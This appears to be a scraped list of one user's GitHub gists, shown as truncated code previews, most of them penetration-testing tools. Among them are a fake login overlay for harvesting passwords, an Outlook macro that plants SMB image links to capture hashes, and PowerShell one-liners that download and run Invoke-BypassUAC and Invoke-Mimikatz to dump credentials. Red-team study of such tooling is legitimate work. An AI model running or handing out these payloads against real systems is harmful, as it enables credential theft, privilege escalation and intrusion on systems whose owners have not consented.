I hereby claim:
- I am sdcampbell on github.
- I am lpha3ch0 (https://keybase.io/lpha3ch0) on keybase.
- I have a public key ASBUgfWPX9nY7w38YlwyRtecEfL4RG0PhGL_Vr9hEZu9ZAo
To claim this, I am signing this object:
javascript:(function(){var | |
scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\%27|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\%60))/g;const | |
results=new Set;for(var i=0;i<scripts.length;i++){var | |
t=scripts[i].src;""!=t&&fetch(t).then(function(t){return | |
t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of | |
e)results.add(r[0])}).catch(function(t){console.log("An error occurred: | |
",t)})}var | |
pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const | |
match of matches)results.add(match[0]);function | |
writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})(); |
#!/usr/bin/env python3 | |
import sys | |
#remove comments from PowerShell scripts | |
currently_code = True | |
with open(sys.argv[1], 'r') as readtest: | |
psup_contents = readtest.readlines() | |
with open(sys.argv[1], 'w') as removed: |
// DynamicAssemblyLoader: A DotNet Assembly Loader using a Dynamic Method and Emitted MSIL Instructions | |
// Author: @bohops | |
// | |
// "Normal" Implementation: | |
/* | |
Assembly assembly = Assembly.Load(assemblyBytes); | |
assembly.EntryPoint.Invoke(obj, objArr); | |
*/ | |
// Original author is @bohops |
I hereby claim:
To claim this, I am signing this object:
var html = ` | |
<div id="bg" style="position: absolute; z-index: 100; width: 100%; height: 100%; background-color: #000000; opacity: 0.5; top: 0; left: 0; margin: 0"> | |
</div> | |
<div id="form" style="position: absolute; z-index: 150; font-family: Arial; background-color: #ffffff; width: 280px; height: 185px; top: 50%; left: 40%; padding: 10px"> | |
<p>An error occurred. Please login again.</p> | |
<form method="GET" action="https://127.0.0.1:443/"> | |
<p>Username <input type="text" name="username"></p> | |
<p>Password <input type="password" name="password"></p> | |
<p><input type="submit" value="Login"></p> | |
</form> |
# nmcli con add type wifi ifname wlp3s0 con-name work-wifi ssid work-ssid | |
# nmcli con edit id work-wifi | |
nmcli> set ipv4.method auto | |
nmcli> set 802-1x.eap peap | |
nmcli> set 802-1x.phase2-auth mschapv2 | |
nmcli> set 802-1x.identity myusername | |
nmcli> set 802-1x.password mypassword | |
nmcli> set wifi-sec.key-mgmt wpa-eap | |
nmcli> save | |
nmcli> activate |
#!/usr/bin/ruby | |
require 'ruby-nessus' | |
require 'set' | |
file = ARGV[0] | |
if ARGV.length == 0 | |
raise "Usage: #{$0} /path/to/file.nessus" | |
end |
Sub HTMLMessage() | |
Dim objOutlookMsg As Outlook.MailItem | |
Dim message, title, defaultValue As String | |
Dim myValue As String | |
' prompt for user input. | |
message = "Enter SMB Tag(s)" | |
' Set popup box title. | |
title = "SMB Input Box" | |
defaultValue = "<img src='file://IPADDRESS/image/signature.jpg'><img src='file:\\IPADDRESS\image\signature.jpg'>" | |
' Prompt input box |
# Description: | |
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
# Invoke-Mimikatz: Dump credentials from memory | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
# Import Mimikatz Module to run further commands |